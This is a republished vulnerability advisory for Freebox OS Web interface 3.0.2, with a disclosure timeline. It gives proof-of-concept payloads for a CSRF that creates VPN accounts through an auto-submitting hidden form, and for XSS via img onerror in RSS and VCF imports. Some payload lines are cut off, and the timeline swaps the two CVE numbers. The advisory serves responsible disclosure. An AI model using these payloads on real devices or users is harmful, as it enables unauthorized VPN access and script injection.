Информационная безопасность
[RU] switch to English

Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Xloner v3.1.2 wordpress plugin authenticated command execution and XSS

  CVE-2015-4010 - Cross-site Request Forgery & Cross-site Scripting in Encrypted Contact Form Wordpress Plugin v1.0.4

  AnimaGallery 2.6 (theme and lang cookie parameter) Local File Include Vulnerability

  Symphony CMS 2.6.2

From:huyngocbk_(at)_gmail.com <huyngocbk_(at)_gmail.com>
Date:8 июня 2015 г.
Subject:Freebox OS Web interface 3.0.2 XSS, CSRF

Hello list,

Here are two CVEs I reported to Freebox, a french ISP:
- CVE-2014-9382 - CSRF in VPN user account creation
- CVE-2014-9405 - XSS

Vulnerable product: Freebox OS Web interface 3.0.2.

CVE-2014-9382 - CSRF in Freebox OS Web interface 3.0.2 allowing VPN user account creation
Risk level: High

Freebox allows users to create VPN connections to their home network.

In version 3.0.2 when a new user is created, the following JSON request is sent to http://mafreebox.free.fr/api/v3/vpn/user/:


This request is vulnerable to CSRF which is easy to trigger.

The following POC would create a new VPN account "ngocdh" / "1234=5678":

 <body onload=vpn.submit()>
   <form name="vpn" action="http://mafreebox.free.fr/api/v3/vpn/user/" method="POST" enctype="text/plain">
     <input type="hidden" name="{&quot;login&quot;:&quot;ngocdh&quot;,&
value="5678&quot;}" />
     <input type="submit" value="Submit request" />

CVE-2014-9405 - XSS in Freebox OS Web interface 3.0.2
Risk level: low

Two XSS instances with low probability of exploitation were found in the following places:
- Download RSS
- Contacts

The following POC demonstrates the XSS in the "description" field of a Download RSS item:

<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<title>From Huy Ngoc</title>
<description>[email protected]</description>
<atom:link rel="hub" href="http://google.com"/>
<atom:link rel="self" href="http://google.com"/>
       <title>Test by huyngoc</title><description><![CDATA[<img src=/ onerror="alert(document.
       <pubDate>Wed, 19 <b>Nov 2014</b> 20:36:47 UTC</pubDate>

In order to exploit this XSS, the attacker must control a RSS feed to which a user have subscribed.

The following VCF file demonstrates a XSS exploitation POC, "alert(document.domain)" would be called after importing this VCF file from the web interface:

FN:DAU Huy Ngoc
URL:<img src=/ onerror='alert(document.domain);'>

In order to exploit this XSS, the attacker must trick a user into importing his malicious .vcf.

21/11/2014: XSS CVE-2014-9382 is reported to vendor
21/11/2014: vendor confirmed the vulnerability
02/12/2014: CSRF CVE-2014-9405 is reported to vendor
06/12/2014: a hot fix is released (http://dev.freebox.fr/blog/?p=1867)

Credit: DAU Huy Ngoc (@ngocdh)

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород